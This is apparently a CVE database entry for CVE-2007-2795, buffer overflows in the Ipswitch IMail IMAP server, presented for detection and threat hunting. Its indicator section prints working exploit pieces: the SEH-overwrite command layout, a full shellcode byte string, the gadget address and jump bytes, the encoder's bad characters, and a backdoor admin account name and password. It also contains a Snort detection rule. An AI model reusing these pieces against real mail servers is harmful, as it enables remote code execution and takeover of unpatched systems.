cbcvebase.
CVE-2007-2795
published 2009-01-27

CVE-2007-2795: Multiple buffer overflows in Ipswitch IMail before 2006.21 allow remote attackers or authenticated users to execute arbitrary code via (1) the authentication…

PriorityP260critical9CVSS 2.0
AVNACLAuSCCICAC
EXPLOIT
EPSS
24.45%
97.6th percentile
Multiple buffer overflows in Ipswitch IMail before 2006.21 allow remote attackers or authenticated users to execute arbitrary code via (1) the authentication feature in IMailsec.dll, which triggers heap corruption in the IMail Server, or (2) a long SUBSCRIBE IMAP command, which triggers a stack-based buffer overflow in the IMAP Daemon.

Affected

2 ranges
VendorProductVersion rangeFixed in
ipswitchimail<= 2006.2
ipswitchimail

Detection & IOCsextracted from sources · hover to see the quote

port143
command2 SEARCH BEFORE <80x NOP><nextseh><seh><100x NOP><shellcode><300x NOP>
bytes
\xda\xd4\x29\xc9\xb8\xb3\xfe\x8b\x54\xd9\x74\x24\xf4\xb1\x32\x5f\x83\xef\xfc\x31\x47\x14\x03\x47\xa7\x1c\x7e\xa8\x2f\xa4\x81\x51\xaf\xae\xc7\x6d\x24\xcc\xc2\xf5\x3b\xc2\x46\x4a\x23\x97\x06\x75\x52\x4c\xf1\xfe\x60\x19\x03\xef\xb9\xdd\x9d\x43\x3d\x1d\xe9\x9c\xfc\x54\x1f\xa2\x3c\x83\xd4\x9f\x94\x70\x11\x95\xf1\xf2\x46\x71\xf8\xef\x1f\xf2\xf6\xa4\x54\x5b\x1a\x3a\x80\xef\x3e\xb7\x57\x1b\xb7\x9b\x73\xdf\x04\x7c\x4d\x29\xea\xd5\xc9\x5e\xac\xe9\x9a\x21\x3c\x81\xed\xbd\x91\x1e\x65\xb6\x60\xd8\xf5\x06\x18\x49\x92\x76\x56\x6d\x3d\x1f\xfe\x90\x4b\xd1\xa9\x93\xab\x8d\x38\x08\x1a\x37\xba\xb5\x42\x98\x59\x16\xed\x83\xe9\x76\x84\x38\x74\x05\x46\xcd\x46\xd9\xf2\x11\xd4\x29\xcb\x25\x6a\x7a\x1b\xb2\xab\x5b\x7b\x15\xea\xdf\x3f\x49\xca\xf9\x9f\xe7\x77\x72\xc0\x9b\x18\x19\x61\x08\x81\xaf\x0e\xa5\x3d\x70\x90\x21\xd0\x19\x7c\xc3\x59\xae\xf2\x72\xe9\x21\x81\x07\x31\xcc\x55\xd8\x45\x10\xb9\x59\xe1\x14\xc5\x53
bytes
\xC4\x2A\x02\x75
bytes
\xeb\x10\x90\x90
snort
alert tcp $EXTERNAL_NET any -> $HOME_NET 143 (msg:"GPL IMAP login buffer overflow attempt"; flow:established,to_server; content:"LOGIN"; isdataat:100,relative; pcre:"/\sLOGIN\s[^\n]{100}/smi"; reference:bugtraq,13727; reference:bugtraq,502; reference:cve,1999-0005; reference:cve,1999-1557; reference:cve,2005-1255; reference:nessus,10123; reference:cve,2007-2795; reference:nessus,10125; classtype:attempted-user; sid:2101842; rev:16; metadata:created_at 2010_09_23, cve CVE_1999_0005, confidence High, signature_severity Major, updated_at 2019_07_26;)
  • The exploit uses a SEARCH BEFORE IMAP command (not SUBSCRIBE) with a malformed argument to trigger the stack-based buffer overflow; monitor for oversized IMAP SEARCH BEFORE arguments on port 143.
  • The SEH overwrite uses the pop/pop/ret gadget at 0x75022AC4 in ws2help.dll on Windows 2000 SP4; presence of this address in network traffic or crash dumps is a strong indicator of exploitation.
  • Successful exploitation creates a local admin account; hunt for new local accounts named 'r00t' with password 'r00tr00t!!' as a post-exploitation indicator.
  • The Snort rule detects LOGIN commands followed by 100+ characters on IMAP port 143; the PCRE pattern /\sLOGIN\s[^\n]{100}/smi covers both the LOGIN heap overflow and similar oversized IMAP auth attempts.
  • Bad characters for the shellcode encoder are null byte, LF, CR, vertical tab, tab, form feed, and space — useful for crafting detection signatures that look for shellcode bypassing these bytes.
  • ·The exploit was tested only on Windows 2000 SP4; the SEH gadget address (0x75022AC4 in ws2help.dll) is OS/patch-level specific and will differ on other platforms.
  • ·The vulnerability affects Ipswitch IMail before version 2006.21; the exploit targets IMAP Server 9.20 specifically.
  • ·The Snort rule (sid:2101842) covers multiple CVEs beyond CVE-2007-2795 (including CVE-1999-0005, CVE-1999-1557, CVE-2005-1255); tune alerting context accordingly to avoid false attribution.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.